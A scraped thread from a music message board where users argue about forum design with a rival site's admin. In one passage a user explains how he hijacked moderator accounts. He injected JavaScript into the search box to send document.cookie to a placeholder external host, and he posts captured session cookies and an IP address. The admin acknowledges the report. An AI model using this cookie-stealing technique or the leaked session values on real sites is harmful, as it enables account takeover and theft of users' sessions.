 |
|
You are not logged in! F.A.Q Log in Register |
 |
|
 |
 Now online (1)belb ...and 226 guests Last 5 registered Oplandisks nothingstar N_loop yipe foxtrotromeo Browse members... |
 |
Members 8025Messages 2614103 Today 0 Topics 127542 |
|
|||||||||
| |||||||||
|
|
it was easier to ddos joyrex' place than it was to crash xlt. so there. |
||||||||
|
|
|||||||||
| |||||||||
|
|
I used to do it by visiting the forum. |
||||||||
|
|
|||||||||
| |||||||||
|
|
nice banner, giginger! :) |
||||||||
|
|
|||||||||
| |||||||||
|
|
I was wondering where he went, I always liked him and his music. anyone care to explain what happened, or is this not a good thing to discuss? Sorry no disrepect, im just curious where panda went... |
||||||||
|
|
|||||||||
| |||||||||
|
|
I feel it oozes Web2.0 |
||||||||
|
|
|||||||||
| |||||||||
|
|
is it that css effect thingie? I remember some site you linked once... |
||||||||
|
|
|||||||||
| |||||||||
|
|
hehe..... well, at least we're gonna try to avoid all the fun and hyped up 2.0-ish colorschemes (green, pink, blue etc) |
||||||||
|
|
|||||||||
| |||||||||
|
|
watmm makes my eyes hurt |
||||||||
|
|
|||||||||
| |||||||||
|
|
That site is gone or else I'd have used that. Would've looked nicer too. |
||||||||
|
|
|||||||||
| |||||||||
|
|
watmm is lovely. xlt is lovely. can't we just all get along? p.s. fuck off |
||||||||
|
|
|||||||||
| |||||||||
|
|
stop this thread please |
||||||||
|
|
|||||||||
| |||||||||
|
|
They don't have very creative avatars is all I'm gonna say. |
||||||||
|
|
|||||||||
| |||||||||
|
|
you referring to mine? yes, it's rubbish. i thank you.... |
||||||||
|
|
|||||||||
| |||||||||
|
|
The xlt vs watmm debate: |
||||||||
| Attached picture | |||||||||
|
|||||||||
|
|
|||||||||
| |||||||||
|
|
keep in mind, you do have at least one major security hole, the XSS on your search function. In fact, as I post this, I am not actually HMA but someone else using a proxy server. Check my ip address, Im sure it can be done. I also have valid sessionID as horsefactory. I used to have a valid login for you, Phobiazero, but either recently you logged out and logged back in, invalidating your cookies, or you figured out I was logged in as you every day for the past 2 weeks or so. In any case, what I did was as following. in the search box if put a "> you can add html after that, so I injected javascript to point to some freewebspace as so: "http://nonexistantwebsitethatdoesntexist.com/folder/evilph p.php?cookies=" . document.cookie;, and then posting the link that said "hey, theres something wrong with your search function.". The first time I did this with my actual ulcresh login, and 2 people followed the link, HMA and Horsefactory, and a couple guests. There was this whole little thing with Dog_Belch, who by being a dick was actually more intelligent than some others. I used the HMA account to repost a similar hacked link a couple weeks later. 1 non-guest clicked it. Phobiazero. It was very fun to see all the moderator buttons. They seem very underpowered to be honest and I agree with the assessment that you need to improve them. However, requiring typing the password to change the profile is very secure, good job on that. Here are the full log files (edited to keep the important info and remove guests): (this is hma) Opera/8.54 (Windows NT 5.1; U; en) --- (this is my ULCRESH login, yes, thats right, I just gave ANYONE the ability to log in as ULCRESH) AFX_NU_SESSION= Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 --- (horsefactory) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1) Gecko/20061010 Firefox/2.0 stupid post character limit. FIX THAT. |
||||||||
|
|
|||||||||
| |||||||||
|
|
You should probably mail that, instead of posting it |
||||||||
|
|
|||||||||
| |||||||||
|
|
anyway, to continue my post as horsefactory: ------------------- (this is phobiazero) his cookies that are no longer valid: __utma=96777942.1310899365.1164665989.1164835731.1164871283 .13; APHEXTWIN_MBOARD_ORDERCHOICE=DESC; __utmz=96777942.1164665989.1.1.utmccn=(direct)|utmcsr=(dire AFX_NU_SESSION=b61bc043e54f32bd954f3df2a6e8e687.1; ct)|utmcmd=(none); __utmb=96777942; __utmc=96777942 219.65.132.1 Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.1) Gecko/20061010 Firefox/2.0 You really should fix that. I was gonna log in as Phobiazero and make an "I love WATMM and XLTV2 is vaporware" post, but I was no longer able to. this is unfortunate. if youre going to write web applications, KNOW something about security, especially since this runs on PHP v3. Read up on XSS, SQL Injection, RFI, etc. |
||||||||
|
|
|||||||||
| |||||||||
|
|
ps, why can't moderators see people's IP addresses and user agents, stuff like that is useful. |
||||||||
|
|
|||||||||
| |||||||||
|
|
also, I did 4 things with these logins: 1) delete my HMA post which Phobiazero had clicked on. 2) I accidentally posted as horsefactory a while back, because I thought I was ULCRESH, he posted right after that saying "I did not post that" 3) I banned some random person that hasn't logged in for several months, just to try it out. 4) I closed some thread, just to try it out. I think that was it. I could've theoretically banned all of your moderators. |
||||||||
|
|
|||||||||
| |||||||||
|
|
Lovely. Thanks for not doing that. |
||||||||
|
|
|||||||||
| |||||||||
|
|
Well, that's certainly amusing. |
||||||||
|
|
|||||||||
| |||||||||
|
|
In other news. Zilty has taken to looking like this at work. Despite hard refreshing and clearing of cache. |
||||||||
|
|
|||||||||
| |||||||||
|
|
"Newest message first!" |
||||||||
|
|
|||||||||
| |||||||||
|
|
Hell yes. For some reason that works for me on Zilty. |
||||||||
|
|
|||||||||
| |||||||||
|
|
That's like, such a totally rad and awesome concept, dude. I can't get my head around the paradigm shift. Dude! |
||||||||
|
|
|||||||||
| |||||||||
|
|
haha :) good stuff and well written. |
||||||||
|
|
|||||||||
| |||||||||
|
|
it's because of my profile infos Namastè |
||||||||
|
|
|||||||||
| |||||||||
|
|
Gnarly! |
||||||||
|
|
|||||||||
| |||||||||
|
|
nice xss.. so why aren't sessions validated against ip addresses?.. if the ip has changed since the session was created, you should be required to log back in.. |
||||||||
|
|
|||||||||
| |||||||||
|
|
good stuff here :) and phob, keep this board minimal. i don't want stupid-emoticons, edit buttons, quote buttons, sup buttons, howdy buttons, howru buttons, or anything else . most sites are so damn bloated these days :( |
||||||||
|
|
|||||||||
| |||||||||
|
|
ah yeah, the beta-search... we've added some protection for that now. as for ip <-> sessions....... xltv2. i'm sure ppl are prepared to sacrify some laziness in order to get some tighter security. as for ULCRESH: feel free to contact me per email/icq/aim for some further discussions/cooperation. i appreciate your efforts in finding out the bug. we're not using php3 tho... :) |
||||||||
|
|
|||||||||
| |||||||||
|
|
good to hear that you won't go commercial with the forum phobs. the custom mb as xlt is, is one of the few reasons i like it here. |
||||||||
|
|
|||||||||
| |||||||||
|
|
PWN |
||||||||
|
|
|||||||||
| |||||||||
|
|
Of course there's never been any hacks for the Invision Power Board. |
||||||||
|
|
|||||||||
| |||||||||
|
|
lol.. |
||||||||
|
|
|||||||||
| |||||||||
|
|
Let's see if I can follow up to your broken English reply (if there was a proper quote feature I could use that, but oh well... also, I had to do this in two posts since you have a post limit "feature" in place...) sorry to disappoint you, joyrex... [You haven't - I was just making an observation/suggestion you took way too seriously] i believe in our concept/forum just as hard as you believe in mainstream and commercial forums... [That's great - no problem there] to be honest, i feel sick everytime i see a forum from "one-of-the-three-messageboard-companies". it's prolly the scandinavian, minimalistic side of me. [I agree with you on that - most out of the box forums tend to go overboard on features, but most of them allow you to turn things off as they are not needed. So, if I wished, I could make our forum follow a direct, minimalist edict. I actually tried using the forums that came built into the CMS I use for WATMM, but most users missed those features they had gotten used to with the prior forum, so we went back. I see this here occasionally when people ask for common forum features that this one doesn't have. You then have to make the choice of making the majority happy, or stick to your guns and ignore user needs. Hard choice, IMO. but to nail the issue.... we can add a myriads of features and functions, but we choose to implement only stuff that makes sense. [As you should... no argument there] do you really think the lack of an edit-button is a technical issue due to our "custom" system? [No, of course not - I just find it odd that a basic feature like editing is still not implemented. I wonder how many posts are followups to what could have been corrected with an edit feature.] no. i've dismissed the idea of having an edit-feature just as long you've known html - due to various reasons (use the search-feature to find my previous rantings on this). [Understood - just I think something as basic as editing would be worth considering, even if limite |
||||||||
|
|
|||||||||
| |||||||||
|
|
jeg skal pakke deg inn i bobleplast og pule morra di skal jeg |
||||||||
|
|
|||||||||
| |||||||||
|
|
haha, wow |
||||||||
|
|
|||||||||
| |||||||||
|
|
d in time (like on our forums).] as for better tools for the admins, yeah... xltv2 will take care of that. we removed some of the admin-tools due to the infamous Virginpusher-scandal a couple of months ago. imagine a mod on drugs, feeling hatress against his webmaster, and at the same time having the power of deleting entire threads with a single click! well, we just thought we would disable these features for a while. it's not like we don't trust our current team of mods, but xltv2 is having a more enhanced set of admin-tools. [See, there you go - if one of my mods were to go apeshit, I could just disable his or her account, rather than cripple my othe r mods. That's really more a matter of choosing people you can trust, though.] was that one of the issues with our custom software, joyrex? i've personally seen ALOT more complains towards your forum than against xltronic/mb (maybe because i hardly visit watmm). [You're right - in fact, I can't recall the last time I got a complaint about the forum itself] (slow, ugly, clumsy, unstable and what's more...) but at least you can EDIT messages - HELL YEAH! :) [That's a bit immature (but expected) - the forum is not slow, ugly is only due to my lack of taking the time to customize the look, and clumsy is a matter of opinion, really - the majority of forum users have no problem with the interface, and it was developed with a larger testbed of users than XLT will ever have, FYI]. Unstable is totally off-base considering many large companies put lots of money behind using these forums - they simply wouldn't if that was the case, and we can do a LOT more than just edit.] actually, i don't understand why you're still spreading your annoying, commercial pep-talk here after all these years... [Just a friendly suggestion/observation - and it's not like I do this all the time] |
||||||||
|
|
|||||||||
| |||||||||
|
|
why don't you try to get some distance to your own "mess" over there? you don't have to answer that btw - i know it's like a nail in the eye. believe me. [Not really - and since I can't understand your meaning there (I don't fault you for English not being your native language), I really can't say much other than I tend to be more helpful to others than myself - a bit of a failing on my part, really...] well, time will tell... [It always does, Mattias, it always does :) ] |
||||||||
|
|
|||||||||
| |||||||||
|
|
That would be nice if I knew what it said, but I don't pretend to know Swedish. |
||||||||
|
|
|||||||||
| |||||||||
|
|
He wants to purchase bubblewrap and congratulate your mother |
||||||||
|
|
|||||||||
| |||||||||
|
|
Once more... |
||||||||
| Attached picture | |||||||||
|
|||||||||
|
|
|||||||||
| |||||||||
|
|
|
||||||||
|
|
|||||||||
| |||||||||
|
|
please dont hack my account i post enough rubbish as it is |
||||||||
|
|
|||||||||
| |||||||||
|
|
Edit features are rubbish. The fact that people have to post a follow up maintains a chronological relationship in the thread, which is easy to follow. I dislike the design of message boards which have multiple seperate sub forums, it's too divergent. For example, I want to scan down for a topic from yesterday. I can't search for it because I cannot remember what it was (this is hypothetical), however I will recognise it when I see it. On a single forum, I scroll down from the latest post until the posts from yesterday, and I will see it. On a multi sub forum one, I potentially have to do that on all the forums. Also unless you look at each forum, you could miss a good topic, wheras on here, it is pretty obvious because it's all on one page. The whole look of watmm is cluttered imo. Too many buttons, too many signatures, images on the end of EVERY post by a user and general crap. I use the mouse wheel and my eye to judge the scroll per content amount, and I think xlt wins. - - - Although there may be bugs, one has to commend Phobia and Tune on the fine job done on this site. Perhaps it is idiosynchratic, but it's how they want it. If it's so bad, surely people won't come and it will die out? (natural selection et al). Joyrex: I think it's quite counter productive and a bit petty to come on here and troll around. "(stand with arms outstretched, awaiting XLT firing squad)" surely that is not how you end a productive post? I know there is history, but perhaps keep quiet or say to Phob you're sorry people are abusing the board, and perhaps show some empathy, I'm sure people have abused watmm and I bet you didn't like it. Anyway, life is too short, less hate, more love..... |
||||||||
|
|
|||||||||
| |||||||||
|
|
I would have paid $200 for that information if nobody else knew still. I would have sold it to sneakattack for $400, and xltronic as we know it would be no more, muah ha ha ha. |
||||||||
|
|
|||||||||
| |||||||||
|
|
ugly is only due to my lack of taking the time to customize the look, and clumsy is a matter of opinion, really - the majority of forum users have no problem with the interface, and it was developed with a larger testbed of users than XLT will ever have, FYI |
||||||||
| Attached picture | |||||||||
|
|||||||||
|
|
|||||||||
| |||||||||
|
|
if there was a proper quote feature I could use that, but oh well... |
||||||||
|
|
|||||||||
| |||||||||
|
|
there is an edit button it's called PREVIEW |
||||||||
|
|
|||||||||
|
Messageboard index
|
|||||||||
